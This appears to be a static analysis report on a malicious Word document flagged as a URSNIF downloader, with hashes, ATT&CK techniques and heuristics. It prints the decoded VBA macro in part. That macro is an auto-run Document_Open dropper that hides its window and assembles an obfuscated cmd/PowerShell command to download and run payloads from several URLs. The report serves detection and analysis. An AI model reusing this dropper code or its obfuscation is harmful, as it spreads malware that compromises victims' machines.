Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b34e7bc43fb098f1…

MALICIOUS

Office (OLE)

63.4 KB Created: 2018-09-06 21:45:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 0e55369f16f323dd7fdef2a016033584 SHA-1: 4b9619fbe59d979ac9ed1306291e7d4edd9ddf83 SHA-256: b34e7bc43fb098f19a863943221594ca09fc62bba72de128ef6a9f144f22a033
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The Document_Open macro executes a Shell() command, which is designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' further supports this behavior.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5498 bytes
SHA-256: fc89da7781b8a980cb2610d061a197d8cdae28769931df48e3d1732c626a0dcf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "PMUszjjZEuik"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(GJzKbfTc) + MjBDwbiWJR + cKIpoSvEFLuBU + znTRd + JWrcGHCDcA + BIrZANhUiIbLSj + QzQjpBmqAhGPAo, vbHide
End Sub



Attribute VB_Name = "iMijNRs"
Function znTRd()

On _
Error _
Resume _
Next
Month "if" + "284030241"
   Month "p" + "jQpNIjM" + "Xsb" + "T"
   Month "1921" + "paWZijD"
aSNZojawqFi = Chr(3 + 16 + 16 + 11 + 53) + "md " + "/V^:^ON" + "/" + Chr(2 + 11 + 11 + 7 + 36) + Chr(0 + 5 + 5 + 3 + 21) + "^" + "se^t " + "^1N^D"
Month "373192534" + "a"
   Month "MYvH" + "D"
   Month "dhdPlXRLlGDO" + "1561"
   Month "zncUmHosEAi" + "Cf" + "pFi" + "Vi"
PpUarmR = "=^" + "  " + "^ ^  " + " ^ ^   " + "^ ^  " + "^" + " ^   " + "^}}{" + "h" + Chr(3 + 16 + 16 + 11 + 53) + "^t^a" + Chr(3 + 16 + 16 + 11 + 53) + "}"
Month "488827858" + "u"
   Month "TQJbCSTuGT" + "NlbzaWOHUwMfnu"
   Month "q" + "JYvsvRKLJ"
   Month "86567593" + "N" + "mnJCkcd" + "aVl"
   Month "73532472" + "AVwOFJYQwrzdp"
   Month "jbs" + "GvnpwQdOhPlHk"
JbvollFzfHq = ";^kae" + "rb;^m" + "T^w^$" + "^" + " " + "m" + "et^I-" + "e^ko" + "vnI;" + ")^m" + "Tw^$"
Month "49579110" + "Lczw"
   Month "8303" + "wBRrjfKOc" + "8890" + "K"
   Month "V" + "KnPMUinV" + "7679" + "8887"
   Month "2073" + "353692349"
isibIW = "^ ,R" + "^Bu^$(^" + "el" + "iFd^" + "a" + "^o" + "^ln^woD" + "^.^i^Q"
Month "jRD" + "vAD"
   Month "fKARtCbQnApiLt" + "8373"
   Month "Qkp" + "jzNajoMjrYjd"
SEcJFJY = "P^$^{^y" + "r^t{)^S" + "u^L$ " + "n^i" + " R^Bu$" + "(" + "h" + Chr(3 + 16 + 16 + 11 + 53) + "^aerof" + "^;^'ex^"
Month "2117" + "265067882" + "301828824" + "6514"
   Month "110875160" + "7521" + "fOQLBt" + "ZzuUXSM"
   Month "8784" + "Oi" + "fza" + "Fpr"
QPMkmMFAh = "e." + "'" + "+w^m^P^" + "$^+" + "'\" + "^'^+" + Chr(3 + 16 + 16 + 11 + 53) + "il" + "b^" + "u^p:v" + "ne$^=m"
Month "MJHHE" + "3052" + "7333" + "CUd"
   Month "205593295" + "coapTpR" + "sTOqnH" + "FhKVJUHInk"
uCMvwEqdM = "^Tw^$^" + ";^'9^" + "53^'" + "^ =^ w^" + "mP$;" + ")" + "^'" + "@" + "^'(til" + "pS" + ".^'" + "^d^" + "F7^S/"
Month "acw" + "48211091"
   Month "iCIzrlAatWzz" + "UzUjVJ"
dkJcA = "l^p.a^b" + Chr(3 + 16 + 16 + 11 + 53) + "^.tr^" + "a-^z" + Chr(3 + 16 + 16 + 11 + 53) + "^" + "i" + "r" + "^" + "a^m" + "//^:pt" + "^"
Month "3150" + "VfnF" + "1387" + "ZC"
ClVtSIvOD = "t" + "h" + "@" + Chr(2 + 11 + 11 + 7 + 36) + "KMU^" + "a^" + "P^8" + "j/mo" + Chr(3 + 16 + 16 + 11 + 53) + "^" + ".^" + "y" + "n" + "^af^f^"
Month "2556" + "izIFbFp" + "Uj" + "445967031"
   Month "LpQsQuu" + "mb" + "163603569" + "7465"
wnJZwKLU = "i^" + "t^y" + "bg" + "n^i" + "n^i^art" + "g^o" + "^d//" + "^"
znTRd = aSNZojawqFi + PpUarmR + JbvollFzfHq + isibIW + SEcJFJY + QPMkmMFAh + uCMvwEqdM + dkJcA + ClVtSIvOD + wnJZwKLU
   Month "YwtCttLmf" + "4779" + "WvjWBTb" + "n"
   Month "cLm" + "bXoFZT" + "7546" + "Muta"
   Month "nwq" + "UwoNIIKIkC"
End Function
Function JWrcGHCDcA()

On _
Error _
Resume _
Next
Month "INwS" + "499807265" + "PiwoQf" + "Wu"
   Month "510163247" + "rum"
JhSdqIba = ":^pt^t" + "^h^" + "@^P" + Chr(3 + 16 + 16 + 11 + 53) + "^2" + "6G/^l" + "p^.a" + "^b" + Chr(3 + 16 + 16 + 11 + 53) + "^" + "." + "sn" + "art^" + "h" + Chr(3 + 16 + 16 + 11 + 53) + "^o^k//:" + "^p"
Month "2393" + "280078838"
   Month "5078" + "bsjmHqhiOi" + "bqjEaav" + "i"
   Month "Q" + "zGm"
Ipajjq = "t^" + "t^h@P^p" + "^9kl^Q" + "^3/^" + "mo" + Chr(3 + 16 + 16 + 11 + 53) + "^." + "e^s" + "^ir^p" + "retn^e" + "^i^s^d" + "//^:" + "^"
Month "DAZQ" + "rvVk" + "cQmA" + "113283547"
   Month "279096717" + "336721570" + "3998" + "Tt"
   Month "FmjIoPF" + "B"
sOiRLAtLbVv = "pt^" + "th@B" + "y/^" + "s^la^" + "tn^e" + "r^." + "m" + "^od//" + "^:p^"
Month "VG" + "h" + "uwo" + "387113719"
   Month "TTsE" + "XFC" + "5006" + "YuZhYXpQcVt"
AsijUL = "t^t" + "^" + "h
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.